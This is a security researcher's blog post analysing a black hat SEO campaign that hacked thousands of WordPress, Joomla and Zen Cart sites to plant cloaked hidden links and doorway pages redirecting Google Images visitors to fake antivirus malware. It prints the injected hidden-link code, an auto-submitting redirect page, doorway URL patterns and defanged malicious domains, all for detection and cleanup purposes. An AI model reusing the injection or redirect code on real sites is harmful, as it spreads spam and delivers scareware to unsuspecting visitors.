msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Following the Black Hat SEO Traces

   14 Aug 11   Filed in Tips and Tricks, Website exploits

This is a follow up to my last week’s post about hacked WordPress blogs and poisoned Google Images search results. Cyber-criminals infiltrated 4,000+ self-hosted WP blogs and created doorway pages that would redirect visitors coming from Google Images search to scareware sites. A few days ago I posted a short update to let you know that Google has removed the doorway pages from its index. I also promised to share some new interesting details about that black hat SEO campaign. So here we go!

Cloaked links

To have Google discover and index rogue doorway pages, the attackers needed to place links on web pages that Google already knows about and regularly crawls. One of the popular approaches is to create free websites and post links there (there are many services that allow to do it). However, in this particular case I couldn’t find such external links.

Then I checked cached versions of legitimate web pages on the hacked sites and found the following code right before the closing </body> tag.

<style>#alkg {position:absolute;overflow:auto;height:0;width:0;}</style><font id="alkg"><a href="http://example.com/?ccc=niger-culture-picture">niger culture picture</a><br />...<a href="http://example.com/?ccc=eric-ogbogu-picture">eric ogbogu picture</a><br /><a href="http://rankexplorer.com">Poker Software</a></font>

The code cannot be found if you open the same web page in a browser. This means that hackers used cloaking to feed these links to search engine spiders only.

This code defines an invisible style (height:0; width:0) and then lists dozens to hundreds of links to doorway pages on that site inside the <font> block that has that invisible style. The name of that style is a random combination of four letters and it changes from site to site.

This trick prevents webmasters form seeing the spammy links when they check cached web pages (of course, unless they scrutinize the HTML code) and at the same time provides links that don’t look like invisible to Googlebot (I guess Google is well aware of such tricks though ;-) ).

The placement of this spammy code makes me think that hackers injected it into the footer.php file of the blogs’ themes. Most likely the actual code is encrypted (e.g. with the base64_decode or some other obfuscation trick) so check the code right before the </body> tag.

SEO Anomaly

I noticed one interesting thing. Every link block on every hacked site has a link to rankexplorer .com. The anchor text is always the same: Poker Software.

The domain was registered on February 21st, 2011 and already has PageRank 5. That was very suspicious. Only very popular sites can get PR5 in such a short time. So I decided to check who linked to the rankexplorer site and how seriously those links on the hacked sites contribute to this rapid progress.

Yahoo Site Explorer

First, I checked external backlinks using Yahoo Site Explorer:

Yahoo Site Explorer

The report says there are 1,858,186 external links to 7 pages on this site. Impressive!

It was clear that sites at the top of the list were hacked. But it was not clear how many of those 1,800,000+ links are from hacked sites and if there are many (or rather any) legitimate links. Moreover, YSE doesn’t distinguish “doFollow” and “noFollow” links so it’s hard to use this report to tell which links actually contribute to the high PageRank. (For example, there can be many “noFollow” links from spammy blog comments and forum posts).

MajesticSEO Site Explorer

So the next step was a more thorough investigation using MajesticSEO Site Explorer. MajesticSEO maintains quite a fresh index (updated 2-3 times a day) and its size is comparable to that of Yahoo (they claim that only Google has a larger index). What’s more important, they provide various backlink reports that allow to easily spot interesting patterns and anomalies.

Lets begin with the Domain Information report:

Domain Information

Well, the number of external links here is significantly smaller than in Yahoo Site Explorer. But we should not forget that this is a “fresh index” and we deal with hacked sites that get cleaned up once their webmasters notice the hack.

The useful information here is:

  • very few link are “NoFollow” – 0.3% (so the comment and forum spam is not the case)
  • quite a few deleted links – (webmasters remove spammy links from hacked sites)
  • domains/links ratio suggests that multiple pages of the same site link to rankexplorer — quite typical for spammy links.
  • most of the linking sites reside on different servers and even on different subnetworks – (they are not just from one hacked server).

The same report has a “Referring Domains” history graph

Reffering domains graph

You can see a spike on July 20th. This matches the beginning of the black hat SEO campaign.

The “Top Pages” report shows that all external links point to the home page only. That’s not typical even for a small site with so many backlinks.

Top Pages

The most revealing data can be found in the Top Backlinks report. It provides a list of up to 2,500 referring URLs (Majestic Silver plan) in order of their significance for SEO along with the anchor text (!) of the backlinks.

Top Backlinks

Main insights:

  • Out of 2,500 backlinks , 2,426 (97%) have the “poker software” anchor text – (This anchor text is used on hacked sites)
  • 60 backlinks (2.4%) have the “poker statistics” anchor text. They are hidden links on a few supposedly hacked sites (different attack though). The spammy code look like this:
    <div style=”display:none“><li><a href=”hxxp://rankexplorer .com“>Poker Statistics</a></li></div>
  • The rest 13 links can be easily neglected.
    • One of them comes from Baidu search results (why does MajesticSEO index Baidu SERPs?!)
    • Six “software de poker” and “”poker mjukvara“” are from a hacked site that uses some sort of auto-translation that translated all spammy links into Spanish and Swedish ;-)

And finally, the “Referring Domains” report shows that most of the domains can also be found in my list of WordPress sites affected by this black hat SEO attack.

So the backlink analisys clearly shows that the rankexplorer .com owes its high PageRank exclusively to black hat techniques.

PageRank vs real SERP positions

Was it worth the effort for rankexplorer? Not that much. If we search for [poker software] or even for ["poker software"] on all major search engines, the rankexplorer is nowhere near the top. The top two Google search results for this query currently link to sites with PageRank 4, and #3 has PR3! As Matt Cutts always says: PageRank is only one of many factors that affect site position in search results.

So were all the spammers’ efforts futile? Not exactly. For some queries (I won’t call them popular) you can find the rankexplorer on the first page of search results. Currently it is #4 for the ["poker statistics analyzer"] query.

Interesting sidenote. Out of all major search enignes, Baidu (#1 search engine in China!) is the most susceptible to the rankexplorer‘s black hat SEO campaign:

Baidu

Previous generation of this campaign

The MajesticSEO’s reports helped me find some sites where the injected code and doorway pages were different than in the attack that I described last week. Moreover, some of the sites were not WordPress blogs. After some additional analysis, I figured out it was a previous generation of the same attack. Here are the details:

Checking cached versions (Google cache) of legitimate pages on the compromised sites, I found a familiar cloaked blocks of hidden link that used the style/font trick:

<style>#xhxq {position:absolute;overflow:auto;height:0;width:0;}</style><font id="xhxq"><li><a href="http://example.com/?olg=55680">80s movie posters</a></li>
...skipped..
<a href="hxxp://rankexplorer .com">Poker Software</a>
...skipped..
<li><a href="http://www.example.org/?eea=go.php5">powered by smf best back up software</a></li></font>

However, instead of linking to doorways on the same site, those blocks linked to doorways on multiple third party sites (usually about 50 unique sites in one block). And the rankexplorer link was in the middle of the block this time.

This cross-linking scheme helped me identify 700+ hacked sites. Most of them can be identified as WordPress blogs, Joomla sites and Zen Cart online stores.

URL patterns

The most common URL patterns of the doorway pages are:

example.com/[a-z]{3,4}=<random>.<extension>, where <random> is a random combination of characters, digits and hyphens, and <extension> is a one of the popular file extensions of web pages (html|htm|shtml|php|php3|php4|php5|phtml|jsp|asp). The extension part can be missing.

Examples:

  • example.co.uk/?mrx=zc-31.html
  • example.com/?jlq=bi5k5.phtml
  • example.de/?pce=9mlbqc.htm
  • example.eu/?tnj=57720.php3
  • example.cl/?slf=9283-upfy

Another popular doorway URL pattern is example.org/[a-z]{3}-<keywords>.<extension>, where <keywords> are hyphen separated keywords targeted by the doorway page.

Examples:

  • example.com/qlv-wallpapers-cowgirl-stock-photos.asp (note, this page is on a Linux server that has no ASP)
  • example.net/qxr-trail-of-tears-coloring-pages.php5
  • example.se/lck-multiplication-chart-1-500.html

And the combination of the above two patterns: example.net/[a-z]{3,4}=<keywords>.<extension>

  • example.org/?jyw=make-your-own-art-online.php4
  • example.com/?liz=sample-1023-arts-organization.shtml
  • example.net/?klb=dem-mac-martial-arts.php
  • example.es/?jys=art-of-8000-bce-500-ce

Chronology of the attack

Some of the websites have already been cleaned up. On such sites, I can only find the spammy content in 2-3 months’ old cached copies, which proves that this attack was active around May 2011. We can find one more evidence of this in the MajesticSEO report for the notorious rankexplorer .com site that uses its “historic” index.

Historic index

This graph shows that MajesticSEO began to index links to rankexplorer .com (and we know they all come from hacked sites) in April. Then the was a peak in May (new indexed domains referencing rankexplorer). Almost 0 new domains in June and then another uptrend in July (which corresponds to the attack against WordPress blogs that I described last week)

Still malicious

Although that wave of the black hat SEO campaign has been idle for at least a couple of months now, many of the compromised sites still contain malicious web pages. As in the most recent attack, they only redirect visitors to scareware sites if they come from Google Images search (clicking on web search results won’t trigger the redirect.)

Redirects

For visitors from Google Images, the doorway generate a page with an invisible form and a JavaScript that automatically clicks on the form button, which effectively redirects a browser to a Fake AV site:

<html><head>
<script>
function TDov(){setTi meout('ob()', 1);document.getElementById('go').click();}
function F99FAEE4E1A331A7595932B7C18F9F5F6(){try{history.forward();}catch(e){}setTim eout('ob()', 10);}
</script>
</head><body onLoad='TDov()'>
<form action='hxxp://atomiccanyon .com/BrightonFestival2009/xmlrpc.php?k=fredericksburg+tx+historic+district+map&s=google&r=http%3A%2F%2Fwww.google.com%2Fimgres%3Fimgurl%3...skipped..' method='POST' target='_top'>
<button type='submit' id='go' style='visibility:hidden'></button></form>
</body></html>

As you can see, the URL structure resembles the structure of the first URL in the redirect chain of the ongoing attack.

Some of the sites also use a similar form URL on the cricketfunde .com domain.

Then, this intermediary URL redirects visitors to actual fake AV sites. Currently, they use multiple *.rr.nu domains:

  • hxxp://www4.powersecurityex .rr .nu/?hch86z0i65=jNjRnHOtYpxcpdnTtJiY59nPst…
  • hxxp://www3. powergcjsentinel .rr .nu/?39gnl9=V67Q0qlrqKad1dvLoJ2Z2eLgpqCWoWie…
  • hxxp://www1 .simplecwahscanner .rr .nu/2dgnv5l5k?4h6xtulyq2=WNKj2%….

They seem to be changing every day. Old domain expire quite quickly. When I last checked, they used the 79 .133 .196 .117 address.

Malware

The binary download begins from a different (although similar) domain:

  • hxxp://www2 .thebest-mhcleaner .rr .nu/duqr211_323.php?xw0lonwp=nOGdz%2B…%3D%3D
  • hxxp://www2 .bestsuitehri .rr .nu/yvbt211_323.php?o5aayuuvor=k63E0Lbu…%3D%3D

The downloaded file have names like fix_pack107d_323.exe and fix_pack211d_323.exe (links to VirusTotal reports) and their detection rates are usually less than 30%. I rechecked one file 20 hours later and it’s detection rate improved from 27% to 33% – by that time the malicious server began to serve a different variation of the same file.

Redirects for Macs

For Mac users, the redirect chain is different:

www4 .powersecurityex .rr .nu -> rdr .cz .cc/go.php?7&said=323 -> www .moviedir .com/1093251

By the way, the moviedir site has Google PageRank 4. And it shouldn’t be a surprise that many of its backlinks are from hacked sites.

Google strikes back

While hacked site still contain malicious code and may redirect Image searches to dangerous sites, Google has done a great job to mitigate the problem and removed the doorway page from its index.

I checked many hacked sites using the site: operator in Google search. Only very few of them had indexed doorways. And even when I could find links to doorways in web search results, Image search results for the same sites were free from poisoned images! (I have a feeling that for some hacked sites Google removed legitimate images as well)

I have also noticed the “This site may be compromised” warning on search results for home pages of many hacked sites.

At this time, both generations of this particular Google Image poisoning campaign seem to be neutralized by Google. Good job!

##
Removing poisoned links from search result doesn’t completely solves the problem. There are still thousands of compromised sites that criminals can reuse for different attacks. Moreover, I still don’t have reliable information about the attack vector (what security holes hackers exploit and how they integrate malicious code into legitimate websites), so millions of WordPress blogs and Joomla sites are potentially vulnerable to similar attacks. If you have any information, please share it in comments or contact me directly.

If you work in a security department of a large shared hosting provider, please contact me. The chances are I know some compromised sites on your servers (5,000+ sites on my list, typically 1-2 sites per IP, but sometimes up to 300). Together we can find out what’s going on.

Thank you!

Related posts:

Reader's Comments (6)

  1. |

    http://www.rankexplorer is doing illegal way of linking. He’s using a plugin to inject his backlinks.

    Try to install this plugin:
    Email Subscription Box After Post Content

    In an instant, you will have 248 OUTBOUND links including http://www.rankexplorer.

    He must be punished.

  2. |

    Check out this link for how the wordpress sites were (probably) hacked.

    http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

  3. |

    I got hacked by this virus ,re-installed wordpress and it disappeared ,but I think that some files are still infected and don’t know how to fix them, I got 100+ blogs at that host and fix them all fully with hands would be too hard.. if someone know how to fix it ,please write here a comment

    • |

      1. Export backup of blog

      2. FTP download copy of uploads folder (youll need the images later)

      3. Terminate account via cpanel

      4a. Re-create account and fresh install blog.

      4b. DO NOT USE ‘admin’ as user name. Choose ANY other user-name.

      4c. Use a different password.

      5. Import files *import should be assigned to new user name, not the old one.

      6. Youll have to re-upload images into each page because they must populate in database. Simply uploading the uploads folder wont work.

      7. Deactivate ANY and ALL plugins not in use.

      *I was hot three times on seperate sites. This is the fastest way to correct the problem.

      • |

        Important: It is not enough to deactivate ANY and ALL plugins (themes, etc.) not in use. If they are still on your server (even deactivated) they can still be exploited. – Remove everything that you don’t use.

  4. |

    This is one of best ‘straight and clear’ articles which I wrote in last few months. This is not an empty words. Speaking th etruth, knowledge from this sites, can be implemented both ways (as usual): to prevent own sites / clients sites through analysis…or to learn more and implement blackhat techniques.

    I know where I’m standing for. So, it is useful for preventing, for me :)